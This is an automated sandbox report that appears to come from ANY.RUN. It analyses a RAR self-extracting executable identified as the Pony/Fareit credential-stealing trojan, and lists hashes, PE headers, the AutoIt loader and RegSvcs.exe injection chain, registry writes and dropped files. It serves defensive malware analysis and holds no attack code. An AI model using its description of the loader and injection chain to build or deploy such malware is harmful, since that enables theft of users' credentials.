General Info

File name

8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe

Full analysis
https://app.any.run/tasks/890037ff-e99b-462a-8f09-3e85ab899f73
Verdict
Malicious activity
Analysis date
11/8/2018, 17:12:04
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

trojan

pony

fareit

autoit

Indicators:

MIME:
application/x-dosexec
File info:
PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
MD5

0a1607169843dd56b26686fc0b180d04

SHA1

37c8a45797e686e8d1593bdb64cd3e19b38f610b

SHA256

8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8

SSDEEP

12288:OK2mhAMJ/cPlbVwPCkZZMiBKiaWpz1vulrreJA+LmbdjY07+bn1hf3rU6OGPATC7:f2O/GlbHk0SAMBvuwmxhKbH3rUO46GfG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
120 seconds
Additional time used
60 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Connects to CnC server
  • RegSvcs.exe (PID: 3708)
Detected Pony/Fareit Trojan
  • RegSvcs.exe (PID: 3708)
Application was dropped or rewritten from another process
  • hhl.exe (PID: 1696)
  • hhl.exe (PID: 3440)
Actions looks like stealing of personal data
  • RegSvcs.exe (PID: 3708)
Starts CMD.EXE for commands execution
  • RegSvcs.exe (PID: 3708)
Executable content was dropped or overwritten
  • 8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe (PID: 3832)
Drop AutoIt3 executable file
  • 8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe (PID: 3832)
Application launched itself
  • hhl.exe (PID: 3440)
Dropped object may contain Bitcoin addresses
  • hhl.exe (PID: 3440)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.exe
|   Win32 Executable MS Visual C++ (generic) (35.8%)
.exe
|   Win64 Executable (generic) (31.7%)
.scr
|   Windows screen saver (15%)
.dll
|   Win32 Dynamic Link Library (generic) (7.5%)
.exe
|   Win32 Executable (generic) (5.1%)
EXIF
EXE
MachineType:
Intel 386 or later, and compatibles
TimeStamp:
2012:06:09 15:19:49+02:00
PEType:
PE32
LinkerVersion:
9
CodeSize:
74752
InitializedDataSize:
58880
UninitializedDataSize:
null
EntryPoint:
0xac87
OSVersion:
5
ImageVersion:
null
SubsystemVersion:
5
Subsystem:
Windows GUI
Summary
Architecture:
IMAGE_FILE_MACHINE_I386
Subsystem:
IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date:
09-Jun-2012 13:19:49
Detected languages
English - United States
Process Default Language
Debug artifacts
d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb
DOS Header
Magic number:
MZ
Bytes on last page of file:
0x0090
Pages in file:
0x0003
Relocations:
0x0000
Size of header:
0x0004
Min extra paragraphs:
0x0000
Max extra paragraphs:
0xFFFF
Initial SS value:
0x0000
Initial SP value:
0x00B8
Checksum:
0x0000
Initial IP value:
0x0000
Initial CS value:
0x0000
Overlay number:
0x0000
OEM identifier:
0x0000
OEM information:
0x0000
Address of NE header:
0x000000F0
PE Headers
Signature:
PE
Machine:
IMAGE_FILE_MACHINE_I386
Number of sections:
5
Time date stamp:
09-Jun-2012 13:19:49
Pointer to Symbol Table:
0x00000000
Number of symbols:
0
Size of Optional Header:
0x00E0
Characteristics
IMAGE_FILE_32BIT_MACHINE
IMAGE_FILE_EXECUTABLE_IMAGE
IMAGE_FILE_RELOCS_STRIPPED
Sections
Name Virtual Address Virtual Size Raw Size Charateristics Entropy
.text 0x00001000 0x0001231E 0x00012400 IMAGE_SCN_CNT_CODE,IMAGE_SCN_MEM_EXECUTE,IMAGE_SCN_MEM_READ 6.55555
.rdata 0x00014000 0x00001D15 0x00001E00 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 4.99401
.data 0x00016000 0x00017724 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE 3.54914
.CRT 0x0002E000 0x00000020 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 0.394141
.rsrc 0x0002F000 0x0000C2C0 0x0000C400 IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ 6.45727
Resources
1

7

8

9

10

11

12

100

101

ASKNEXTVOL

GETPASSWORD1

LICENSEDLG

RENAMEDLG

REPLACEFILEDLG

STARTDLG

Imports
    COMCTL32.dll

    SHLWAPI.dll

    KERNEL32.dll

    USER32.dll

    GDI32.dll

    COMDLG32.dll

    ADVAPI32.dll

    SHELL32.dll

    ole32.dll

    OLEAUT32.dll

Exports

    No exports.

Screenshots

Processes

Total processes
35
Monitored processes
5
Malicious processes
4
Suspicious processes
0

Behavior graph

+
drop and start start 8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe hhl.exe no specs hhl.exe no specs #PONY regsvcs.exe cmd.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3832
CMD
"C:\Users\admin\AppData\Local\Temp\8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe"
Path
C:\Users\admin\AppData\Local\Temp\8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\riched32.dll
c:\windows\system32\riched20.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\users\admin\appdata\local\temp\92255107\hhl.exe

PID
3440
CMD
"C:\Users\admin\AppData\Local\Temp\92255107\hhl.exe" jib=xce
Path
C:\Users\admin\AppData\Local\Temp\92255107\hhl.exe
Indicators
No indicators
Parent process
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
AutoIt Team
Description
AutoIt v3 Script
Version
3, 3, 14, 5
Modules
Image
c:\users\admin\appdata\local\temp\92255107\hhl.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winspool.drv
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll

PID
1696
CMD
C:\Users\admin\AppData\Local\Temp\92255107\hhl.exe C:\Users\admin\AppData\Local\Temp\92255107\KZLRV
Path
C:\Users\admin\AppData\Local\Temp\92255107\hhl.exe
Indicators
No indicators
Parent process
hhl.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
AutoIt Team
Description
AutoIt v3 Script
Version
3, 3, 14, 5
Modules
Image
c:\users\admin\appdata\local\temp\92255107\hhl.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winspool.drv
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe

PID
3708
CMD
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Indicators
Parent process
hhl.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft .NET Services Installation Utility
Version
4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\msi.dll
c:\windows\system32\pstorec.dll
c:\windows\system32\atl.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\mlang.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\version.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\samlib.dll
c:\windows\system32\propsys.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\shdocvw.dll

PID
2580
CMD
cmd /c ""C:\Users\admin\AppData\Local\Temp\6142828.bat" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" "
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
RegSvcs.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

Registry activity

Total events
727
Read events
717
Write events
10
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3708
RegSvcs.exe
write
HKEY_CURRENT_USER\Software\WinRAR
HWID
7B32343044424243422D414434422D344538312D393636362D4132383334354232323943367D
3708
RegSvcs.exe
write
HKEY_CURRENT_USER\Software\WinRAR
Client Hash
EDCA4ED1F4F22D88FA515184E0BBFC63
3708
RegSvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3708
RegSvcs.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1

Files activity

Executable files
1
Suspicious files
0
Text files
49
Unknown types
0

Dropped files

PID
Process
Filename
Type
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\hhl.exe
executable
MD5: c56b5f0201a3b3de53e561fe76912bfd
SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\jib=xce
text
MD5: 964a0a2bbe3a33ea3845207aac054aca
SHA256: 5c2eba2adf376d4927073b241deb044abf3b17f9ea279bd456c11a4c841b8dc5
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\apt.jpg
text
MD5: 868f9ed81767b414bdd5dbf3e2db9279
SHA256: e2763247e7f4643d5e7a27665f5ec09340342b22144f523b7a0c3c6b7bc25dde
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\cxe.dat
text
MD5: 432ce4c0a3fc3c0f829cc802451dd09a
SHA256: 0015ef0ec7655c718f2e01e3e63818e3095710e5efff5dca85a80899765d6c1b
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\kpr.xl
text
MD5: f45abe91078c05d0760d8612b670593f
SHA256: 87269bdff217490f644d49188fb8c8a32119b3cb35625bbcbce3f7ade03c23dd
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\vkd.ico
text
MD5: 945b0feea6eb7d0529fc01bcefc6da34
SHA256: cf610a28e3d4ac1da314fb01fa67944eb0892d35b92eed13ff6a6c4e1b23c260
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\btg.xl
text
MD5: 54967611c24137b109839144c2223548
SHA256: 47372e8275cff0d1110e4447875f1e5013db456e45509737ed888bd08936c1d7
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\stx.dat
text
MD5: a738599a50d77196ae0b935c9331570b
SHA256: 2a3c821d011d540870d6c313b4fb84520932f7516965cc1a76eaef11345c71c2
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\hrd.ico
text
MD5: 80d962789e175804c83eea3cc36dcdfb
SHA256: 4d2d7d3e8241aada29f0bd01030c48e95141a6a43293c43764a8329deec3dcb9
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\eun.xl
text
MD5: 51a64c1554426a9615e7997efb9d45dd
SHA256: b248453fba9a89a756f3ac5d7e94599806a27a6b2419ab48fec1899225b01fea
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\apd.xl
text
MD5: 7e85259f51a2661447efb3aebe525daa
SHA256: 5e545be86e451fa4735bd8061ad79ea1b87aad5956f9102d879620e7d913f7da
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\awl.mp4
text
MD5: 07662b4bbccd392e4dac4504b3bbbc18
SHA256: b1efc59c598b9a054969ebed9ab6bcac9f39efebfd6bd3d99b48f9624432c0bd
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\gdk.icm
text
MD5: cf09d82b9b8ab8706478815b00fafc3f
SHA256: 225e03ff56db9ee71ef629df017e7a462b7d67eca46dd8de74c511d90dd6bb2d
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\mlw.xl
text
MD5: 431bad937e1b0334ac8a14dba7aca2aa
SHA256: ea4e2222a104a6f17b2f6331bebddbacf5a889a5e208738ea41ae9c4b0398da7
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\qwp.mp4
text
MD5: dce95a5ac71fe38cbe11c014ba63166c
SHA256: a815064de5ba6cb6eeca00e8756a5f99e08bfb80f5fc6270d9103986aec385bb
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\ltl.ppt
text
MD5: e3f2f92803e1bb5a02004c623986166b
SHA256: f340d9d939892ae152676f1cbab2d60c1e96016df5f22e5f1a6d27011c16224d
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\wjv.mp4
text
MD5: 3062559c70b9345ad38b51007d48c849
SHA256: 6ae28e2fe9e6922d991f72b244f06f460cf108637579bb87e971d036b6942cd1
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\xqv.pdf
text
MD5: 767e7a75bca404860b9c401cf1a1cf29
SHA256: bfeae2a21aba4571daac1a3fdb760fedab4504920e1558fe0d13e3e3f7e294e3
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\pje.docx
text
MD5: c82a12c7d625a61c64543a06d52308c7
SHA256: 4fe894e16b24d19d66e53fe634adcbfbe22850d9e56ba62753c968a634a9e75b
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\qfb.txt
text
MD5: 0b2e4f7b0facd9749c13de61b98ff068
SHA256: 4992a643b205df938f9acb5c6702d7c82124e931f923e5efa2532fa24b053558
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\gvm.icm
text
MD5: 043d1ac27007f0cdc57d7de1165f7fcd
SHA256: 9785f4db55e0b438032450dbb25cfcaa74f153717db3452348e03db962fc27f6
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\xkp.ico
text
MD5: e8a973ce18909e590f82596455d2602d
SHA256: f4c81aacd4135e3331896ddedc35881639eed43d26dbcd1dc2b8216427de4cac
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\wtc.xl
text
MD5: 0d2972cbfde7df629b00cee1bf0d7961
SHA256: fcb4a686e089fef78cc5adc96aa5e2b8e9bdec101f8a191fcd062d046ae928c0
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\lso.ppt
text
MD5: bc744621fa808f7e5a3212c980207b18
SHA256: 7bac6c034699da81387aeaff0d43287e4dd4abffeb6eccc40e30d96ef8afa84c
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\fha.icm
text
MD5: 22d8c417269dd2949b166d59ab29cceb
SHA256: aa4042c69d52037888573677f286cb7d7f96eff2229caa2b3aa5277dddf36313
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\qpe.xl
text
MD5: 00a5a3e4328f1126dfbd97a2d58a3a65
SHA256: 6f574cf1ae0523d13f17aaf927b209a425fe0625163da33c8b59dc444b69335b
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\jac.ppt
text
MD5: 5fa8a38a622303c303bc59ded1637c9e
SHA256: 22a78f65443fa12f2569f70c128d32f338cb7c048d1b679fe4af8d651ded0acd
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\nmn.bmp
text
MD5: b3877672a80725aaec2e6bb1ec42f93f
SHA256: 58a09d046b9e8ecd13c0fe1192f747af4c50ca119ecb7a6c0e4346df9b6258a1
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\een.mp3
text
MD5: b2e6422d814e4966de30e7a3f90e8c1d
SHA256: ee2c07cdb04fe6c2a327681c48c39d29a79ffe1f43f5c0cb098cf2fcb91080e0
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\dir.jpg
text
MD5: e7397f7d3fbdf7e965d6905cb11b4a53
SHA256: 4292b284d468e23f5a5237228fcc6757d5e4e609fbc43970407d5fd38d422114
3832
8e97f8e8283460cf5f58b37d291502e9e529836caddff2fe507b78484c44b8f8.exe
C:\Users\admin\AppData\Local\Temp\92255107\csj.bmp
text
MD5: 65b134a8dd7a7a4d45f01c1fd30a8dbd
SHA256: 755b53b400b72e1cb1ad4acfa96f5d3cd7e0236041821527790c3bc07cec2e01
3832
